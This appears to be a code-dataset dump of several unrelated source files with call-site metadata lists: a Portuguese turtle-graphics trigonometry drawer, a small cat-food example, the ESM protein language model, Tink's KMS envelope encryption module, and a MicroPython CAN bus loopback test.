if self.quadrante == 1:
t.left(180 - self.grau)
self.linha(self.cosseno * self.raio)
t.left(90)
t.forward(self.seno * self.raio)
print (self.seno)
elif self.quadrante == 2:
t.right(self.grau)
self.linha((self.cosseno * self.raio) * -1)
t.right(90)
t.forward(self.seno * self.raio)
print (self.seno)
elif self.quadrante == 3:
t.right(self.grau)
self.linha(self.cosseno * self.raio * -1)
t.left(90)
t.forward(self.seno * self.raio * -1)
print (self.seno)
elif self.quadrante == 4:
t.left(180 - self.grau)
self.linha(self.cosseno * self.raio)
t.left(90)
t.forward(self.seno * self.raio)
print (self.seno)
else:
print("Erro: angulo invalido")
self.reset()
def csen(self):
# DESENHA O COSSENO
t.left(self.grau)
t.forward(self.raio)
t.pencolor("green")
if self.quadrante == 1:
t.right(self.grau + 90)
self.linha(self.seno * self.raio)
t.right(90)
t.forward(self.cosseno * self.raio)
print (self.cosseno)
elif self.quadrante == 2:
t.right(self.grau + 90)
self.linha(self.seno * self.raio)
t.right(90)
t.forward(self.cosseno * self.raio)
print (self.cosseno)
elif self.quadrante == 3:
t.right(self.grau - 90)
self.linha(self.seno * self.raio * -1)
t.right(90)
t.forward(self.cosseno * self.raio * -1)
print (self.cosseno)
elif self.quadrante == 4:
t.right(self.grau - 90)
self.linha(self.seno * self.raio * -1)
t.left(90)
t.forward(self.cosseno * self.raio)
print (self.cosseno)
else:
print("Erro: angulo invalido")
self.reset()
def tan(self):
# DESENHA A TANGENTE
t.left(self.grau)
t.penup()
t.pencolor("blue")
if self.quadrante == 1:
t.forward(self.raio)
t.pendown()
self.linha(math.sqrt(((self.tangente*self.raio)**2) + (self.raio**2)) - self.raio)
t.right(self.grau + 90)
t.forward(self.tangente * self.raio)
print (self.tangente)
elif self.quadrante == 2:
t.left(180)
t.forward(self.raio)
t.pendown()
self.linha(math.sqrt(((self.tangente*self.raio)**2) + (self.raio**2)) - self.raio)
t.left(90 - self.grau)
t.forward(self.tangente * self.raio)
print (self.tangente)
elif self.quadrante == 3:
t.left(180)
t.forward(self.raio)
t.pendown()
self.linha(math.sqrt(((self.tangente*self.raio)**2) + (self.raio**2)) - self.raio)
t.right(self.grau - 90)
t.forward(self.tangente * self.raio)
print (self.tangente)
elif self.quadrante == 4:
t.forward(self.raio)
t.pendown()
self.linha(math.sqrt(((self.tangente*self.raio)**2) + (self.raio**2)) - self.raio)
t.right(90 + self.grau)
t.forward(self.tangente * self.raio)
print (self.tangente)
else:
print("Erro: angulo invalido")
self.reset()
| [((15, 8, 15, 26), 'turtle.bgcolor', 't.bgcolor', ({(15, 18, 15, 25): '"""black"""'}, {}), "('black')", True, 'import turtle as t\n'), ((16, 8, 16, 27), 'turtle.pencolor', 't.pencolor', ({(16, 19, 16, 26): '"""white"""'}, {}), "('white')", True, 'import turtle as t\n'), ((20, 8, 20, 18), 'turtle.left', 't.left', ({(20, 15, 20, 17): '(90)'}, {}), '(90)', True, 'import turtle as t\n'), ((21, 8, 21, 20), 'turtle.forward', 't.forward', ({(21, 18, 21, 19): '(5)'}, {}), '(5)', True, 'import turtle as t\n'), ((22, 8, 22, 20), 'turtle.right', 't.right', ({(22, 16, 22, 19): '(120)'}, {}), '(120)', True, 'import turtle as t\n'), ((23, 8, 23, 21), 'turtle.forward', 't.forward', ({(23, 18, 23, 20): '(10)'}, {}), '(10)', True, 'import turtle as t\n'), ((24, 8, 24, 20), 'turtle.right', 't.right', ({(24, 16, 24, 19): '(120)'}, {}), '(120)', True, 'import turtle as t\n'), ((25, 8, 25, 21), 'turtle.forward', 't.forward', ({(25, 18, 25, 20): '(10)'}, {}), '(10)', True, 'import turtle as t\n'), ((26, 8, 26, 20), 'turtle.right', 't.right', ({(26, 16, 26, 19): '(120)'}, {}), '(120)', True, 'import turtle as t\n'), ((27, 8, 27, 20), 'turtle.forward', 't.forward', ({(27, 18, 27, 19): '(5)'}, {}), '(5)', True, 'import turtle as t\n'), ((28, 8, 28, 19), 'turtle.right', 't.right', ({(28, 16, 28, 18): '(90)'}, {}), '(90)', True, 'import turtle as t\n'), ((41, 8, 41, 28), 'turtle.forward', 't.forward', ({(41, 18, 41, 27): '(pixels % 10)'}, {}), '(pixels % 10)', True, 'import turtle as t\n'), ((45, 8, 45, 17), 'turtle.penup', 't.penup', ({}, {}), '()', True, 'import turtle as t\n'), ((46, 8, 46, 16), 'turtle.home', 't.home', ({}, {}), '()', True, 'import turtle as t\n'), ((47, 8, 47, 19), 'turtle.pendown', 't.pendown', ({}, {}), '()', True, 'import turtle as t\n'), ((48, 8, 48, 18), 'turtle.speed', 't.speed', ({(48, 16, 48, 17): '(0)'}, {}), '(0)', True, 'import turtle as t\n'), ((49, 8, 49, 20), 'turtle.pensize', 't.pensize', ({(49, 18, 49, 19): '(2)'}, {}), '(2)', True, 'import turtle as t\n'), ((50, 8, 50, 27), 'turtle.pencolor', 't.pencolor', ({(50, 19, 50, 26): '"""white"""'}, {}), "('white')", True, 'import turtle as t\n'), ((55, 8, 55, 19), 'turtle.right', 't.right', ({(55, 16, 55, 18): '(90)'}, {}), '(90)', True, 'import turtle as t\n'), ((56, 8, 56, 17), 'turtle.penup', 't.penup', ({}, {}), '()', True, 'import turtle as t\n'), ((57, 8, 57, 28), 'turtle.forward', 't.forward', ({(57, 18, 57, 27): 'self.raio'}, {}), '(self.raio)', True, 'import turtle as t\n'), ((58, 8, 58, 18), 'turtle.left', 't.left', ({(58, 15, 58, 17): '(90)'}, {}), '(90)', True, 'import turtle as t\n'), ((59, 8, 59, 19), 'turtle.pendown', 't.pendown', ({}, {}), '()', True, 'import turtle as t\n'), ((60, 8, 60, 27), 'turtle.circle', 't.circle', ({(60, 17, 60, 26): 'self.raio'}, {}), '(self.raio)', True, 'import turtle as t\n'), ((65, 8, 65, 17), 'turtle.penup', 't.penup', ({}, {}), '()', True, 'import turtle as t\n'), ((66, 8, 66, 34), 'turtle.backward', 't.backward', ({(66, 19, 66, 33): '(self.raio + 50)'}, {}), '(self.raio + 50)', True, 'import turtle as t\n'), ((67, 8, 67, 19), 'turtle.pendown', 't.pendown', ({}, {}), '()', True, 'import turtle as t\n'), ((72, 8, 72, 18), 'turtle.left', 't.left', ({(72, 15, 72, 17): '(90)'}, {}), '(90)', True, 'import turtle as t\n'), ((73, 8, 73, 17), 'turtle.penup', 't.penup', ({}, {}), '()', True, 'import turtle as t\n'), ((74, 8, 74, 34), 'turtle.backward', 't.backward', ({(74, 19, 74, 33): '(self.raio + 50)'}, {}), '(self.raio + 50)', True, 'import turtle as t\n'), ((75, 8, 75, 19), 'turtle.pendown', 't.pendown', ({}, {}), '()', True, 'import turtle as t\n'), ((83, 8, 83, 25), 'turtle.left', 't.left', ({(83, 15, 83, 24): 'self.grau'}, {}), '(self.grau)', True, 'import turtle as t\n'), ((84, 8, 84, 28), 'turtle.forward', 't.forward', ({(84, 18, 84, 27): 'self.raio'}, {}), '(self.raio)', True, 'import turtle as t\n'), ((105, 8, 105, 25), 'turtle.left', 't.left', ({(105, 15, 105, 24): 'self.grau'}, {}), '(self.grau)', True, 'import turtle as t\n'), ((106, 8, 106, 28), 'turtle.forward', 't.forward', ({(106, 18, 106, 27): 'self.raio'}, {}), '(self.raio)', True, 'import turtle as t\n'), ((107, 8, 107, 25), 'turtle.pencolor', 't.pencolor', ({(107, 19, 107, 24): '"""red"""'}, {}), "('red')", True, 'import turtle as t\n'), ((138, 8, 138, 25), 'turtle.left', 't.left', ({(138, 15, 138, 24): 'self.grau'}, {}), '(self.grau)', True, 'import turtle as t\n'), ((139, 8, 139, 28), 'turtle.forward', 't.forward', ({(139, 18, 139, 27): 'self.raio'}, {}), '(self.raio)', True, 'import turtle as t\n'), ((140, 8, 140, 27), 'turtle.pencolor', 't.pencolor', ({(140, 19, 140, 26): '"""green"""'}, {}), "('green')", True, 'import turtle as t\n'), ((171, 8, 171, 25), 'turtle.left', 't.left', ({(171, 15, 171, 24): 'self.grau'}, {}), '(self.grau)', True, 'import turtle as t\n'), ((172, 8, 172, 17), 'turtle.penup', 't.penup', ({}, {}), '()', True, 'import turtle as t\n'), ((173, 8, 173, 26), 'turtle.pencolor', 't.pencolor', ({(173, 19, 173, 25): '"""blue"""'}, {}), "('blue')", True, 'import turtle as t\n'), ((36, 12, 36, 23), 'turtle.pendown', 't.pendown', ({}, {}), '()', True, 'import turtle as t\n'), ((37, 12, 37, 24), 'turtle.forward', 't.forward', ({(37, 22, 37, 23): '(5)'}, {}), '(5)', True, 'import turtle as t\n'), ((38, 12, 38, 21), 'turtle.penup', 't.penup', ({}, {}), '()', True, 'import turtle as t\n'), ((39, 12, 39, 24), 'turtle.forward', 't.forward', ({(39, 22, 39, 23): '(5)'}, {}), '(5)', True, 'import turtle as t\n'), ((40, 12, 40, 23), 'turtle.pendown', 't.pendown', ({}, {}), '()', True, 'import turtle as t\n'), ((87, 29, 87, 52), 'math.radians', 'math.radians', ({(87, 42, 87, 51): 'self.grau'}, {}), '(self.grau)', False, 'import math\n'), ((88, 32, 88, 55), 'math.radians', 'math.radians', ({(88, 45, 88, 54): 'self.grau'}, {}), '(self.grau)', False, 'import math\n'), ((89, 33, 89, 56), 'math.radians', 'math.radians', ({(89, 46, 89, 55): 'self.grau'}, {}), '(self.grau)', False, 'import math\n'), ((109, 12, 109, 35), 'turtle.left', 't.left', ({(109, 19, 109, 34): '(180 - self.grau)'}, {}), '(180 - self.grau)', True, 'import turtle as t\n'), ((111, 12, 111, 22), 'turtle.left', 't.left', ({(111, 19, 111, 21): '(90)'}, {}), '(90)', True, 'import turtle as t\n'), ((112, 12, 112, 44), 'turtle.forward', 't.forward', ({(112, 22, 112, 43): '(self.seno * self.raio)'}, {}), '(self.seno * self.raio)', True, 'import turtle as t\n'), ((142, 12, 142, 35), 'turtle.right', 't.right', ({(142, 20, 142, 34): '(self.grau + 90)'}, {}), '(self.grau + 90)', True, 'import turtle as t\n'), ((144, 12, 144, 23), 'turtle.right', 't.right', ({(144, 20, 144, 22): '(90)'}, {}), '(90)', True, 'import turtle as t\n'), ((145, 12, 145, 47), 'turtle.forward', 't.forward', ({(145, 22, 145, 46): '(self.cosseno * self.raio)'}, {}), '(self.cosseno * self.raio)', True, 'import turtle as t\n'), ((175, 12, 175, 32), 'turtle.forward', 't.forward', ({(175, 22, 175, 31): 'self.raio'}, {}), '(self.raio)', True, 'import turtle as t\n'), ((176, 12, 176, 23), 'turtle.pendown', 't.pendown', ({}, {}), '()', True, 'import turtle as t\n'), ((178, 12, 178, 35), 'turtle.right', 't.right', ({(178, 20, 178, 34): '(self.grau + 90)'}, {}), '(self.grau + 90)', True, 'import turtle as t\n'), ((179, 12, 179, 48), 'turtle.forward', 't.forward', ({(179, 22, 179, 47): '(self.tangente * self.raio)'}, {}), '(self.tangente * self.raio)', True, 'import turtle as t\n'), ((115, 12, 115, 30), 'turtle.right', 't.right', ({(115, 20, 115, 29): 'self.grau'}, {}), '(self.grau)', True, 'import turtle as t\n'), ((117, 12, 117, 23), 'turtle.right', 't.right', ({(117, 20, 117, 22): '(90)'}, {}), '(90)', True, 'import turtle as t\n'), ((118, 12, 118, 44), 'turtle.forward', 't.forward', ({(118, 22, 118, 43): '(self.seno * self.raio)'}, {}), '(self.seno * self.raio)', True, 'import turtle as t\n'), ((148, 12, 148, 35), 'turtle.right', 't.right', ({(148, 20, 148, 34): '(self.grau + 90)'}, {}), '(self.grau + 90)', True, 'import turtle as t\n'), ((150, 12, 150, 23), 'turtle.right', 't.right', ({(150, 20, 150, 22): '(90)'}, {}), '(90)', True, 'import turtle as t\n'), ((151, 12, 151, 47), 'turtle.forward', 't.forward', ({(151, 22, 151, 46): '(self.cosseno * self.raio)'}, {}), '(self.cosseno * self.raio)', True, 'import turtle as t\n'), ((182, 12, 182, 23), 'turtle.left', 't.left', ({(182, 19, 182, 22): '(180)'}, {}), '(180)', True, 'import turtle as t\n'), ((183, 12, 183, 32), 'turtle.forward', 't.forward', ({(183, 22, 183, 31): 'self.raio'}, {}), '(self.raio)', True, 'import turtle as t\n'), ((184, 12, 184, 23), 'turtle.pendown', 't.pendown', ({}, {}), '()', True, 'import turtle as t\n'), ((186, 12, 186, 34), 'turtle.left', 't.left', ({(186, 19, 186, 33): '(90 - self.grau)'}, {}), '(90 - self.grau)', True, 'import turtle as t\n'), ((187, 12, 187, 48), 'turtle.forward', 't.forward', ({(187, 22, 187, 47): '(self.tangente * self.raio)'}, {}), '(self.tangente * self.raio)', True, 'import turtle as t\n'), ((121, 12, 121, 30), 'turtle.right', 't.right', ({(121, 20, 121, 29): 'self.grau'}, {}), '(self.grau)', True, 'import turtle as t\n'), ((123, 12, 123, 22), 'turtle.left', 't.left', ({(123, 19, 123, 21): '(90)'}, {}), '(90)', True, 'import turtle as t\n'), ((124, 12, 124, 49), 'turtle.forward', 't.forward', ({(124, 22, 124, 48): '(self.seno * self.raio * -1)'}, {}), '(self.seno * self.raio * -1)', True, 'import turtle as t\n'), ((154, 12, 154, 35), 'turtle.right', 't.right', ({(154, 20, 154, 34): '(self.grau - 90)'}, {}), '(self.grau - 90)', True, 'import turtle as t\n'), ((156, 12, 156, 23), 'turtle.right', 't.right', ({(156, 20, 156, 22): '(90)'}, {}), '(90)', True, 'import turtle as t\n'), ((157, 12, 157, 52), 'turtle.forward', 't.forward', ({(157, 22, 157, 51): '(self.cosseno * self.raio * -1)'}, {}), '(self.cosseno * self.raio * -1)', True, 'import turtle as t\n'), ((177, 23, 177, 81), 'math.sqrt', 'math.sqrt', ({(177, 33, 177, 80): '((self.tangente * self.raio) ** 2 + self.raio ** 2)'}, {}), '((self.tangente * self.raio) ** 2 + self.raio ** 2)', False, 'import math\n'), ((190, 12, 190, 23), 'turtle.left', 't.left', ({(190, 19, 190, 22): '(180)'}, {}), '(180)', True, 'import turtle as t\n'), ((191, 12, 191, 32), 'turtle.forward', 't.forward', ({(191, 22, 191, 31): 'self.raio'}, {}), '(self.raio)', True, 'import turtle as t\n'), ((192, 12, 192, 23), 'turtle.pendown', 't.pendown', ({}, {}), '()', True, 'import turtle as t\n'), ((194, 12, 194, 35), 'turtle.right', 't.right', ({(194, 20, 194, 34): '(self.grau - 90)'}, {}), '(self.grau - 90)', True, 'import turtle as t\n'), ((195, 12, 195, 48), 'turtle.forward', 't.forward', ({(195, 22, 195, 47): '(self.tangente * self.raio)'}, {}), '(self.tangente * self.raio)', True, 'import turtle as t\n'), ((127, 12, 127, 35), 'turtle.left', 't.left', ({(127, 19, 127, 34): '(180 - self.grau)'}, {}), '(180 - self.grau)', True, 'import turtle as t\n'), ((129, 12, 129, 22), 'turtle.left', 't.left', ({(129, 19, 129, 21): '(90)'}, {}), '(90)', True, 'import turtle as t\n'), ((130, 12, 130, 44), 'turtle.forward', 't.forward', ({(130, 22, 130, 43): '(self.seno * self.raio)'}, {}), '(self.seno * self.raio)', True, 'import turtle as t\n'), ((160, 12, 160, 35), 'turtle.right', 't.right', ({(160, 20, 160, 34): '(self.grau - 90)'}, {}), '(self.grau - 90)', True, 'import turtle as t\n'), ((162, 12, 162, 22), 'turtle.left', 't.left', ({(162, 19, 162, 21): '(90)'}, {}), '(90)', True, 'import turtle as t\n'), ((163, 12, 163, 47), 'turtle.forward', 't.forward', ({(163, 22, 163, 46): '(self.cosseno * self.raio)'}, {}), '(self.cosseno * self.raio)', True, 'import turtle as t\n'), ((185, 23, 185, 81), 'math.sqrt', 'math.sqrt', ({(185, 33, 185, 80): '((self.tangente * self.raio) ** 2 + self.raio ** 2)'}, {}), '((self.tangente * self.raio) ** 2 + self.raio ** 2)', False, 'import math\n'), ((198, 12, 198, 32), 'turtle.forward', 't.forward', ({(198, 22, 198, 31): 'self.raio'}, {}), '(self.raio)', True, 'import turtle as t\n'), ((199, 12, 199, 23), 'turtle.pendown', 't.pendown', ({}, {}), '()', True, 'import turtle as t\n'), ((201, 12, 201, 35), 'turtle.right', 't.right', ({(201, 20, 201, 34): '(90 + self.grau)'}, {}), '(90 + self.grau)', True, 'import turtle as t\n'), ((202, 12, 202, 48), 'turtle.forward', 't.forward', ({(202, 22, 202, 47): '(self.tangente * self.raio)'}, {}), '(self.tangente * self.raio)', True, 'import turtle as t\n'), ((193, 23, 193, 81), 'math.sqrt', 'math.sqrt', ({(193, 33, 193, 80): '((self.tangente * self.raio) ** 2 + self.raio ** 2)'}, {}), '((self.tangente * self.raio) ** 2 + self.raio ** 2)', False, 'import math\n'), ((200, 23, 200, 81), 'math.sqrt', 'math.sqrt', ({(200, 33, 200, 80): '((self.tangente * self.raio) ** 2 + self.raio ** 2)'}, {}), '((self.tangente * self.raio) ** 2 + self.raio ** 2)', False, 'import math\n')] |
IniZio/py-skygear | examples/catapi/feeder.py | 88479678f91e678fd931c28295189bfea2148c79 | def pick_food(name):
if name == "chima":
return "chicken"
else:
return "dry food"
| [] |
crochereau/esm | esm/model.py | 881a3b924d3f74e3cddeb6929e91ee7224ef2ebd | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from .modules import (
TransformerLayer,
LearnedPositionalEmbedding,
SinusoidalPositionalEmbedding,
RobertaLMHead,
ESM1bLayerNorm,
ContactPredictionHead,
)
class ProteinBertModel(nn.Module):
@classmethod
def add_args(cls, parser):
parser.add_argument(
"--num_layers", default=36, type=int, metavar="N", help="number of layers"
)
parser.add_argument(
"--embed_dim", default=1280, type=int, metavar="N", help="embedding dimension"
)
parser.add_argument(
"--logit_bias", action="store_true", help="whether to apply bias to logits"
)
parser.add_argument(
"--ffn_embed_dim",
default=5120,
type=int,
metavar="N",
help="embedding dimension for FFN",
)
parser.add_argument(
"--attention_heads",
default=20,
type=int,
metavar="N",
help="number of attention heads",
)
def __init__(self, args, alphabet):
super().__init__()
self.args = args
self.alphabet_size = len(alphabet)
self.padding_idx = alphabet.padding_idx
self.mask_idx = alphabet.mask_idx
self.cls_idx = alphabet.cls_idx
self.eos_idx = alphabet.eos_idx
if self.args.arch == 'roberta_large':
self.model_version = 'ESM-1b'
self._init_submodules_esm1b()
else:
self.model_version = 'ESM-1'
self._init_submodules_esm1()
def _init_submodules_common(self):
self.embed_tokens = nn.Embedding(
self.alphabet_size, self.args.embed_dim, padding_idx=self.padding_idx
)
self.layers = nn.ModuleList(
[
TransformerLayer(
self.args.embed_dim, self.args.ffn_embed_dim, self.args.attention_heads,
add_bias_kv=(self.model_version != 'ESM-1b'),
use_esm1b_layer_norm=(self.model_version == 'ESM-1b'),
)
for _ in range(self.args.layers)
]
)
self.contact_head = ContactPredictionHead(self.args.layers * self.args.attention_heads)
def _init_submodules_esm1b(self):
self._init_submodules_common()
self.embed_scale = 1
self.embed_positions = LearnedPositionalEmbedding(self.args.max_positions, self.args.embed_dim, self.padding_idx)
self.emb_layer_norm_before = ESM1bLayerNorm(self.args.embed_dim)
self.emb_layer_norm_after = ESM1bLayerNorm(self.args.embed_dim)
self.lm_head = RobertaLMHead(
embed_dim=self.args.embed_dim,
output_dim=self.alphabet_size,
weight=self.embed_tokens.weight
)
def _init_submodules_esm1(self):
self._init_submodules_common()
self.embed_scale = math.sqrt(self.args.embed_dim)
self.embed_positions = SinusoidalPositionalEmbedding(self.args.embed_dim, self.padding_idx)
self.embed_out = nn.Parameter(
torch.zeros((self.alphabet_size, self.args.embed_dim))
)
self.embed_out_bias = None
if self.args.final_bias:
self.embed_out_bias = nn.Parameter(torch.zeros(self.alphabet_size))
def forward(self, tokens, repr_layers=[], need_head_weights=False, return_contacts=False):
if return_contacts:
need_head_weights = True
assert tokens.ndim == 2
padding_mask = tokens.eq(self.padding_idx) # B, T
x = self.embed_scale * self.embed_tokens(tokens)
if getattr(self.args, 'token_dropout', False):
x.masked_fill_((tokens == self.mask_idx).unsqueeze(-1), 0.0)
# x: B x T x C
mask_ratio_train = 0.15 * 0.8
src_lengths = (~padding_mask).sum(-1)
mask_ratio_observed = (tokens == self.mask_idx).sum(-1).float() / src_lengths
x = x * (1 - mask_ratio_train) / (1 - mask_ratio_observed)[:, None, None]
x = x + self.embed_positions(tokens)
if self.model_version == 'ESM-1b':
x = self.emb_layer_norm_before(x)
if padding_mask is not None:
x = x * (1 - padding_mask.unsqueeze(-1).type_as(x))
repr_layers = set(repr_layers)
hidden_representations = {}
if 0 in repr_layers:
hidden_representations[0] = x
if need_head_weights:
attn_weights = []
# (B, T, E) => (T, B, E)
x = x.transpose(0, 1)
if not padding_mask.any():
padding_mask = None
for layer_idx, layer in enumerate(self.layers):
x, attn = layer(x, self_attn_padding_mask=padding_mask, need_head_weights=need_head_weights)
if (layer_idx + 1) in repr_layers:
hidden_representations[layer_idx + 1] = x.transpose(0, 1)
if need_head_weights:
# (H, B, T, T) => (B, H, T, T)
attn_weights.append(attn.transpose(1, 0))
if self.model_version == 'ESM-1b':
x = self.emb_layer_norm_after(x)
x = x.transpose(0, 1) # (T, B, E) => (B, T, E)
# last hidden representation should have layer norm applied
if (layer_idx + 1) in repr_layers:
hidden_representations[layer_idx + 1] = x
x = self.lm_head(x)
else:
x = F.linear(x, self.embed_out, bias=self.embed_out_bias)
x = x.transpose(0, 1) # (T, B, E) => (B, T, E)
result = {"logits": x, "representations": hidden_representations}
if need_head_weights:
# attentions: B x L x H x T x T
attentions = torch.stack(attn_weights, 1)
if self.model_version == "ESM-1":
# ESM-1 models have an additional null-token for attention, which we remove
attentions = attentions[..., :-1]
if padding_mask is not None:
attention_mask = (1 - padding_mask.type_as(attentions))
attention_mask = attention_mask.unsqueeze(1) * attention_mask.unsqueeze(2)
attentions = attentions * attention_mask[:, None, None, :, :]
result["attentions"] = attentions
if return_contacts:
contacts = self._predict_contacts_from_token_attentions(tokens, attentions)
result["contacts"] = contacts
return result
def _predict_contacts_from_token_attentions(self, tokens, attentions):
# remove eos token attentions
if tokens[:, -1].eq(self.eos_idx).any():
eos_mask = tokens.ne(self.eos_idx).to(attentions)
eos_mask = eos_mask.unsqueeze(1) * eos_mask.unsqueeze(2)
attentions = attentions * eos_mask[:, None, None, :, :]
attentions = attentions[..., :-1, :-1]
# remove cls token attentions
if tokens[:, 0].eq(self.cls_idx).all():
attentions = attentions[..., 1:, 1:]
batch_size, layers, heads, seqlen, _ = attentions.size()
attentions = attentions.view(batch_size, layers * heads, seqlen, seqlen)
return self.contact_head(attentions)
def predict_contacts(self, tokens):
return self(tokens, return_contacts=True)["contacts"]
@property
def num_layers(self):
return self.args.layers
| [((65, 28, 67, 9), 'torch.nn.Embedding', 'nn.Embedding', (), '', True, 'import torch.nn as nn\n'), ((95, 27, 95, 57), 'math.sqrt', 'math.sqrt', ({(95, 37, 95, 56): 'self.args.embed_dim'}, {}), '(self.args.embed_dim)', False, 'import math\n'), ((98, 12, 98, 66), 'torch.zeros', 'torch.zeros', ({(98, 24, 98, 65): '(self.alphabet_size, self.args.embed_dim)'}, {}), '((self.alphabet_size, self.args.embed_dim))', False, 'import torch\n'), ((159, 16, 159, 69), 'torch.nn.functional.linear', 'F.linear', (), '', True, 'import torch.nn.functional as F\n'), ((165, 25, 165, 53), 'torch.stack', 'torch.stack', ({(165, 37, 165, 49): 'attn_weights', (165, 51, 165, 52): '1'}, {}), '(attn_weights, 1)', False, 'import torch\n'), ((102, 47, 102, 78), 'torch.zeros', 'torch.zeros', ({(102, 59, 102, 77): 'self.alphabet_size'}, {}), '(self.alphabet_size)', False, 'import torch\n')] |
bfloch/tink | python/tink/aead/kms_envelope_aead.py | aac780590902f726a8e7d6c4e3aa1cd75f4b0ed5 | # Copyright 2020 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module for envelope encryption with KMS."""
from __future__ import absolute_import
from __future__ import division
# Placeholder for import for type annotations
from __future__ import print_function
import struct
from tink.proto import tink_pb2
from tink import aead
from tink import core
# Defines in how many bytes the DEK length will be encoded.
DEK_LEN_BYTES = 4
class KmsEnvelopeAead(aead.Aead):
"""Implements envelope encryption.
Envelope encryption generates a data encryption key (DEK) which is used
to encrypt the payload. The DEK is then send to a KMS to be encrypted and
the encrypted DEK is attached to the ciphertext. In order to decrypt the
ciphertext, the DEK first has to be decrypted by the KMS, and then the DEK
can be used to decrypt the ciphertext. For further information see
https://cloud.google.com/kms/docs/envelope-encryption.
The ciphertext structure is as follows:
* Length of the encrypted DEK: 4 bytes (big endian)
* Encrypted DEK: variable length, specified by the previous 4 bytes
* AEAD payload: variable length
"""
def __init__(self, key_template: tink_pb2.KeyTemplate, remote: aead.Aead):
self.key_template = key_template
self.remote_aead = remote
def encrypt(self, plaintext: bytes, associated_data: bytes) -> bytes:
# Get new key from template
dek = core.Registry.new_key_data(self.key_template)
dek_aead = core.Registry.primitive(dek, aead.Aead)
# Encrypt plaintext
ciphertext = dek_aead.encrypt(plaintext, associated_data)
# Wrap DEK key values with remote
encrypted_dek = self.remote_aead.encrypt(dek.value, b'')
# Construct ciphertext, DEK length encoded as big endian
enc_dek_len = struct.pack('>I', len(encrypted_dek))
return enc_dek_len + encrypted_dek + ciphertext
def decrypt(self, ciphertext: bytes, associated_data: bytes) -> bytes:
ct_len = len(ciphertext)
# Recover DEK length
if ct_len < DEK_LEN_BYTES:
raise core.TinkError
dek_len = struct.unpack('>I', ciphertext[0:DEK_LEN_BYTES])[0]
# Basic check if DEK length can be valid.
if dek_len > (ct_len - DEK_LEN_BYTES) or dek_len < 0:
raise core.TinkError
# Decrypt DEK with remote AEAD
encrypted_dek_bytes = ciphertext[DEK_LEN_BYTES:DEK_LEN_BYTES + dek_len]
dek_bytes = self.remote_aead.decrypt(encrypted_dek_bytes, b'')
# Get AEAD primitive based on DEK
dek = tink_pb2.KeyData()
dek.type_url = self.key_template.type_url
dek.value = dek_bytes
dek.key_material_type = tink_pb2.KeyData.KeyMaterialType.SYMMETRIC
dek_aead = core.Registry.primitive(dek, aead.Aead)
# Extract ciphertext payload and decrypt
ct_bytes = ciphertext[DEK_LEN_BYTES + dek_len:]
return dek_aead.decrypt(ct_bytes, associated_data)
| [((53, 10, 53, 55), 'tink.core.Registry.new_key_data', 'core.Registry.new_key_data', ({(53, 37, 53, 54): 'self.key_template'}, {}), '(self.key_template)', False, 'from tink import core\n'), ((54, 15, 54, 54), 'tink.core.Registry.primitive', 'core.Registry.primitive', ({(54, 39, 54, 42): 'dek', (54, 44, 54, 53): 'aead.Aead'}, {}), '(dek, aead.Aead)', False, 'from tink import core\n'), ((84, 10, 84, 28), 'tink.proto.tink_pb2.KeyData', 'tink_pb2.KeyData', ({}, {}), '()', False, 'from tink.proto import tink_pb2\n'), ((88, 15, 88, 54), 'tink.core.Registry.primitive', 'core.Registry.primitive', ({(88, 39, 88, 42): 'dek', (88, 44, 88, 53): 'aead.Aead'}, {}), '(dek, aead.Aead)', False, 'from tink import core\n'), ((73, 14, 73, 62), 'struct.unpack', 'struct.unpack', ({(73, 28, 73, 32): '""">I"""', (73, 34, 73, 61): 'ciphertext[0:DEK_LEN_BYTES]'}, {}), "('>I', ciphertext[0:DEK_LEN_BYTES])", False, 'import struct\n')] |
LabAixBidouille/micropython | tests/pyb/can.py | 11aa6ba456287d6c80598a7ebbebd2887ce8f5a2 | from pyb import CAN
CAN.initfilterbanks(14)
can = CAN(1)
print(can)
can.init(CAN.LOOPBACK)
print(can)
print(can.any(0))
# Catch all filter
can.setfilter(0, CAN.MASK16, 0, (0, 0, 0, 0))
can.send('abcd', 123)
print(can.any(0))
print(can.recv(0))
can.send('abcd', -1)
print(can.recv(0))
can.send('abcd', 0x7FF + 1)
print(can.recv(0))
# Test too long message
try:
can.send('abcdefghi', 0x7FF)
except ValueError:
print('passed')
else:
print('failed')
del can
# Testing extended IDs
can = CAN(1, CAN.LOOPBACK, extframe = True)
# Catch all filter
can.setfilter(0, CAN.MASK32, 0, (0, 0))
print(can)
try:
can.send('abcde', 0x7FF + 1)
except ValueError:
print('failed')
else:
r = can.recv(0)
if r[0] == 0x7FF+1 and r[3] == b'abcde':
print('passed')
else:
print('failed, wrong data received')
del can
# Test RxCallbacks
can = CAN(1, CAN.LOOPBACK)
can.setfilter(0, CAN.LIST16, 0, (1, 2, 3, 4))
can.setfilter(1, CAN.LIST16, 1, (5, 6, 7, 8))
def cb0(bus, reason):
print('cb0')
if reason == 0:
print('pending')
if reason == 1:
print('full')
if reason == 2:
print('overflow')
def cb1(bus, reason):
print('cb1')
if reason == 0:
print('pending')
if reason == 1:
print('full')
if reason == 2:
print('overflow')
def cb0a(bus, reason):
print('cb0a')
if reason == 0:
print('pending')
if reason == 1:
print('full')
if reason == 2:
print('overflow')
def cb1a(bus, reason):
print('cb1a')
if reason == 0:
print('pending')
if reason == 1:
print('full')
if reason == 2:
print('overflow')
can.rxcallback(0, cb0)
can.rxcallback(1, cb1)
can.send('11111111',1)
can.send('22222222',2)
can.send('33333333',3)
can.rxcallback(0, cb0a)
can.send('44444444',4)
can.send('55555555',5)
can.send('66666666',6)
can.send('77777777',7)
can.rxcallback(1, cb1a)
can.send('88888888',8)
print(can.recv(0))
print(can.recv(0))
print(can.recv(0))
print(can.recv(1))
print(can.recv(1))
print(can.recv(1))
can.send('11111111',1)
can.send('55555555',5)
print(can.recv(0))
print(can.recv(1))
